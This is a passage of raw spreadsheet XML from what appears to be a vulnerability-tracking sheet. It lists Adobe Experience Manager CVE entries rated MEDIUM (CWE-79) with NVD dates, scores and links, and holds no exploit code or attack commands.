r="M1382" s="5" t="inlineStr" /><c r="N1382" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1382" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1382" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1382" s="5" t="inlineStr" /><c r="R1382" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75657</t></is></c></row><row r="1383"><c r="A1383" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1383" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1383" s="5" t="inlineStr"><is><t>CVE-2026-75659</t></is></c><c r="D1383" s="5" t="n"><v>5.4</v></c><c r="E1383" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1383" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1383" s="5" t="inlineStr" /><c r="H1383" s="5" t="n"><v>0.002</v></c><c r="I1383" s="5" t="inlineStr" /><c r="J1383" s="5" t="inlineStr" /><c r="K1383" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1383" s="5" t="inlineStr" /><c r="M1383" s="5" t="inlineStr" /><c r="N1383" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1383" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1383" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1383" s="5" t="inlineStr" /><c r="R1383" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75659</t></is></c></row><row r="1384"><c r="A1384" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1384" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1384" s="5" t="inlineStr"><is><t>CVE-2026-75660</t></is></c><c r="D1384" s="5" t="n"><v>5.4</v></c><c r="E1384" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1384" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1384" s="5" t="inlineStr" /><c r="H1384" s="5" t="n"><v>0.002</v></c><c r="I1384" s="5" t="inlineStr" /><c r="J1384" s="5" t="inlineStr" /><c r="K1384" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1384" s="5" t="inlineStr" /><c r="M1384" s="5" t="inlineStr" /><c r="N1384" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1384" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1384" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1384" s="5" t="inlineStr" /><c r="R1384" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75660</t></is></c></row><row r="1385"><c r="A1385" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1385" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1385" s="5" t="inlineStr"><is><t>CVE-2026-75661</t></is></c><c r="D1385" s="5" t="n"><v>5.4</v></c><c r="E1385" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1385" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1385" s="5" t="inlineStr" /><c r="H1385" s="5" t="n"><v>0.003</v></c><c r="I1385" s="5" t="inlineStr" /><c r="J1385" s="5" t="inlineStr" /><c r="K1385" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1385" s="5" t="inlineStr" /><c r="M1385" s="5" t="inlineStr" /><c r="N1385" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1385" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1385" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1385" s="5" t="inlineStr" /><c r="R1385" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75661</t></is></c></row><row r="1386"><c r="A1386" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1386" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1386" s="5" t="inlineStr"><is><t>CVE-2026-75666</t></is></c><c r="D1386" s="5" t="n"><v>5.4</v></c><c r="E1386" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1386" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1386" s="5" t="inlineStr" /><c r="H1386" s="5" t="n"><v>0.003</v></c><c r="I1386" s="5" t="inlineStr" /><c r="J1386" s="5" t="inlineStr" /><c r="K1386" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1386" s="5" t="inlineStr" /><c r="M1386" s="5" t="inlineStr" /><c r="N1386" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1386" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1386" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1386" s="5" t="inlineStr" /><c r="R1386" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75666</t></is></c></row><row r="1387"><c r="A1387" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1387" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1387" s="5" t="inlineStr"><is><t>CVE-2026-75667</t></is></c><c r="D1387" s="5" t="n"><v>5.4</v></c><c r="E1387" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1387" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1387" s="5" t="inlineStr" /><c r="H1387" s="5" t="n"><v>0.003</v></c><c r="I1387" s="5" t="inlineStr" /><c r="J1387" s="5" t="inlineStr" /><c r="K1387" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1387" s="5" t="inlineStr" /><c r="M1387" s="5" t="inlineStr" /><c r="N1387" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1387" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1387" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1387" s="5" t="inlineStr" /><c r="R1387" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75667</t></is></c></row><row r="1388"><c r="A1388" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1388" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1388" s="5" t="inlineStr"><is><t>CVE-2026-75668</t></is></c><c r="D1388" s="5" t="n"><v>5.4</v></c><c r="E1388" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1388" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1388" s="5" t="inlineStr" /><c r="H1388" s="5" t="n"><v>0.003</v></c><c r="I1388" s="5" t="inlineStr" /><c r="J1388" s="5" t="inlineStr" /><c r="K1388" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1388" s="5" t="inlineStr" /><c r="M1388" s="5" t="inlineStr" /><c r="N1388" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1388" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1388" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1388" s="5" t="inlineStr" /><c r="R1388" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75668</t></is></c></row><row r="1389"><c r="A1389" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1389" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1389" s="5" t="inlineStr"><is><t>CVE-2026-75669</t></is></c><c r="D1389" s="5" t="n"><v>5.4</v></c><c r="E1389" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1389" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1389" s="5" t="inlineStr" /><c r="H1389" s="5" t="n"><v>0.003</v></c><c r="I1389" s="5" t="inlineStr" /><c r="J1389" s="5" t="inlineStr" /><c r="K1389" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1389" s="5" t="inlineStr" /><c r="M1389" s="5" t="inlineStr" /><c r="N1389" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1389" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1389" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1389" s="5" t="inlineStr" /><c r="R1389" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S138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9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75669</t></is></c></row><row r="1390"><c r="A1390" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1390" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1390" s="5" t="inlineStr"><is><t>CVE-2026-75670</t></is></c><c r="D1390" s="5" t="n"><v>5.4</v></c><c r="E1390" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1390" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1390" s="5" t="inlineStr" /><c r="H1390" s="5" t="n"><v>0.003</v></c><c r="I1390" s="5" t="inlineStr" /><c r="J1390" s="5" t="inlineStr" /><c r="K1390" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1390" s="5" t="inlineStr" /><c r="M1390" s="5" t="inlineStr" /><c r="N1390" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1390" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1390" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1390" s="5" t="inlineStr" /><c r="R1390" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75670</t></is></c></row><row r="1391"><c r="A1391" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1391" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1391" s="5" t="inlineStr"><is><t>CVE-2026-75671</t></is></c><c r="D1391" s="5" t="n"><v>5.4</v></c><c r="E1391" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1391" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1391" s="5" t="inlineStr" /><c r="H1391" s="5" t="n"><v>0.003</v></c><c r="I1391" s="5" t="inlineStr" /><c r="J1391" s="5" t="inlineStr" /><c r="K1391" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1391" s="5" t="inlineStr" /><c r="M1391" s="5" t="inlineStr" /><c r="N1391" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1391" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1391" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1391" s="5" t="inlineStr" /><c r="R1391" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75671</t></is></c></row><row r="1392"><c r="A1392" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1392" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1392" s="5" t="inlineStr"><is><t>CVE-2026-75672</t></is></c><c r="D1392" s="5" t="n"><v>5.4</v></c><c r="E1392" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1392" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1392" s="5" t="inlineStr" /><c r="H1392" s="5" t="n"><v>0.003</v></c><c r="I1392" s="5" t="inlineStr" /><c r="J1392" s="5" t="inlineStr" /><c r="K1392" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1392" s="5" t="inlineStr" /><c r="M1392" s="5" t="inlineStr" /><c r="N1392" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1392" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1392" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1392" s="5" t="inlineStr" /><c r="R1392" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75672</t></is></c></row><row r="1393"><c r="A1393" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1393" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1393" s="5" t="inlineStr"><is><t>CVE-2026-75674</t></is></c><c r="D1393" s="5" t="n"><v>5.4</v></c><c r="E1393" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1393" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1393" s="5" t="inlineStr" /><c r="H1393" s="5" t="n"><v>0.003</v></c><c r="I1393" s="5" t="inlineStr" /><c r="J1393" s="5" t="inlineStr" /><c r="K1393" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1393" s="5" t="inlineStr" /><c r="M1393" s="5" t="inlineStr" /><c r="N1393" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1393" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1393" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1393" s="5" t="inlineStr" /><c r="R1393" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75674</t></is></c></row><row r="1394"><c r="A1394" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1394" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1394" s="5" t="inlineStr"><is><t>CVE-2026-75675</t></is></c><c r="D1394" s="5" t="n"><v>5.4</v></c><c r="E1394" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1394" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1394" s="5" t="inlineStr" /><c r="H1394" s="5" t="n"><v>0.003</v></c><c r="I1394" s="5" t="inlineStr" /><c r="J1394" s="5" t="inlineStr" /><c r="K1394" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1394" s="5" t="inlineStr" /><c r="M1394" s="5" t="inlineStr" /><c r="N1394" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1394" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1394" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1394" s="5" t="inlineStr" /><c r="R1394" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75675</t></is></c></row><row r="1395"><c r="A1395" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1395" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1395" s="5" t="inlineStr"><is><t>CVE-2026-75677</t></is></c><c r="D1395" s="5" t="n"><v>5.4</v></c><c r="E1395" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1395" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1395" s="5" t="inlineStr" /><c r="H1395" s="5" t="n"><v>0.003</v></c><c r="I1395" s="5" t="inlineStr" /><c r="J1395" s="5" t="inlineStr" /><c r="K1395" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1395" s="5" t="inlineStr" /><c r="M1395" s="5" t="inlineStr" /><c r="N1395" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1395" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1395" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1395" s="5" t="inlineStr" /><c r="R1395" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75677</t></is></c></row><row r="1396"><c r="A1396" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1396" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1396" s="5" t="inlineStr"><is><t>CVE-2026-75678</t></is></c><c r="D1396" s="5" t="n"><v>5.4</v></c><c r="E1396" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1396" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1396" s="5" t="inlineStr" /><c r="H1396" s="5" t="n"><v>0.003</v></c><c r="I1396" s="5" t="inlineStr" /><c r="J1396" s="5" t="inlineStr" /><c r="K1396" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1396" s="5" t="inlineStr" /><c r="M1396" s="5" t="inlineStr" /><c r="N1396" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1396" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1396" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1396" s="5" t="inlineStr" /><c r="R1396" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75678</t></is></c></row><row r="1397"><c r="A1397" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1397" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1397" s="5" t="inlineStr"><is><t>CVE-2026-75679</t></is></c><c r="D1397" s="5" t="n"><v>5.4</v></c><c r="E1397" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1397" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1397" s="5" t="inlineStr" /><c r="H1397" s="5" t="n"><v>0.003</v></c><c r="I1397" s="5" t="inlineStr" /><c r="J1397" s="5" t="inlineStr" /><c r="K1397" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1397" s="5" t="inlineStr" /><c r="M1397" s="5" t="inlineStr" /><c r="N1397" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1397" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1397" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1397" s="5" t="inlineStr" /><c r="R1397" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75679</t></is></c></row><row r="1398"><c r="A1398" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1398" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1398" s="5" t="inlineStr"><is><t>CVE-2026-75680</t></is></c><c r="D1398" s="5" t="n"><v>5.4</v></c><c r="E1398" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1398" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1398" s="5" t="inlineStr" /><c r="H1398" s="5" t="n"><v>0.003</v></c><c r="I1398" s="5" t="inlineStr" /><c r="J1398" s="5" t="inlineStr" /><c r="K1398" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1398" s="5" t="inlineStr" /><c r="M1398" s="5" t="inlineStr" /><c r="N1398" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1398" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1398" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1398" s="5" t="inlineStr" /><c r="R1398" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75680</t></is></c></row><row r="1399"><c r="A1399" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1399" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1399" s="5" t="inlineStr"><is><t>CVE-2026-75681</t></is></c><c r="D1399" s="5" t="n"><v>5.4</v></c><c r="E1399" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1399" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1399" s="5" t="inlineStr" /><c r="H1399" s="5" t="n"><v>0.003</v></c><c r="I1399" s="5" t="inlineStr" /><c r="J1399" s="5" t="inlineStr" /><c r="K1399" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1399" s="5" t="inlineStr" /><c r="M1399" s="5" t="inlineStr" /><c r="N1399" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1399" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1399" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1399" s="5" t="inlineStr" /><c r="R1399" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75681</t></is></c></row><row r="1400"><c r="A1400" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1400" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1400" s="5" t="inlineStr"><is><t>CVE-2026-75683</t></is></c><c r="D1400" s="5" t="n"><v>5.4</v></c><c r="E1400" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1400" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1400" s="5" t="inlineStr" /><c r="H1400" s="5" t="n"><v>0.003</v></c><c r="I1400" s="5" t="inlineStr" /><c r="J1400" s="5" t="inlineStr" /><c r="K1400" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1400" s="5" t="inlineStr" /><c r="M1400" s="5" t="inlineStr" /><c r="N1400" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1400" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1400" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1400" s="5" t="inlineStr" /><c r="R1400" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75683</t></is></c></row><row r="1401"><c r="A1401" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1401" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1401" s="5" t="inlineStr"><is><t>CVE-2026-75685</t></is></c><c r="D1401" s="5" t="n"><v>5.4</v></c><c r="E1401" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1401" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1401" s="5" t="inlineStr" /><c r="H1401" s="5" t="n"><v>0.003</v></c><c r="I1401" s="5" t="inlineStr" /><c r="J1401" s="5" t="inlineStr" /><c r="K1401" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1401" s="5" t="inlineStr" /><c r="M1401" s="5" t="inlineStr" /><c r="N1401" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1401" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1401" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1401" s="5" t="inlineStr" /><c r="R1401" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75685</t></is></c></row><row r="1402"><c r="A1402" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1402" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1402" s="5" t="inlineStr"><is><t>CVE-2026-75687</t></is></c><c r="D1402" s="5" t="n"><v>5.4</v></c><c r="E1402" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1402" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1402" s="5" t="inlineStr" /><c r="H1402" s="5" t="n"><v>0.003</v></c><c r="I1402" s="5" t="inlineStr" /><c r="J1402" s="5" t="inlineStr" /><c r="K1402" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1402" s="5" t="inlineStr" /><c r="M1402" s="5" t="inlineStr" /><c r="N1402" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1402" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1402" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1402" s="5" t="inlineStr" /><c r="R1402" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75687</t></is></c></row><row r="1403"><c r="A1403" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1403" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1403" s="5" t="inlineStr"><is><t>CVE-2026-75690</t></is></c><c r="D1403" s="5" t="n"><v>5.4</v></c><c r="E1403" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1403" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1403" s="5" t="inlineStr" /><c r="H1403" s="5" t="n"><v>0.003</v></c><c r="I1403" s="5" t="inlineStr" /><c r="J1403" s="5" t="inlineStr" /><c r="K1403" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1403" s="5" t="inlineStr" /><c r="M1403" s="5" t="inlineStr" /><c r="N1403" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1403" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1403" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1403" s="5" t="inlineStr" /><c r="R1403" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75690</t></is></c></row><row r="1404"><c r="A1404" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1404" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1404" s="5" t="inlineStr"><is><t>CVE-2026-75691</t></is></c><c r="D1404" s="5" t="n"><v>5.4</v></c><c r="E1404" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1404" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1404" s="5" t="inlineStr" /><c r="H1404" s="5" t="n"><v>0.003</v></c><c r="I1404" s="5" t="inlineStr" /><c r="J1404" s="5" t="inlineStr" /><c r="K1404" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1404" s="5" t="inlineStr" /><c r="M1404" s="5" t="inlineStr" /><c r="N1404" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1404" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1404" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1404" s="5" t="inlineStr" /><c r="R1404" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75691</t></is></c></row><row r="1405"><c r="A1405" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1405" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1405" s="5" t="inlineStr"><is><t>CVE-2026-75692</t></is></c><c r="D1405" s="5" t="n"><v>5.4</v></c><c r="E1405" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1405" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1405" s="5" t="inlineStr" /><c r="H1405" s="5" t="n"><v>0.003</v></c><c r="I1405" s="5" t="inlineStr" /><c r="J1405" s="5" t="inlineStr" /><c r="K1405" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1405" s="5" t="inlineStr" /><c r="M1405" s="5" t="inlineStr" /><c r="N1405" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1405" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1405" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1405" s="5" t="inlineStr" /><c r="R1405" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75692</t></is></c></row><row r="1406"><c r="A1406" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1406" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1406" s="5" t="inlineStr"><is><t>CVE-2026-75693</t></is></c><c r="D1406" s="5" t="n"><v>5.4</v></c><c r="E1406" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1406" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1406" s="5" t="inlineStr" /><c r="H1406" s="5" t="n"><v>0.003</v></c><c r="I1406" s="5" t="inlineStr" /><c r="J1406" s="5" t="inlineStr" /><c r="K1406" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1406" s="5" t="inlineStr" /><c r="M1406" s="5" t="inlineStr" /><c r="N1406" s="5" 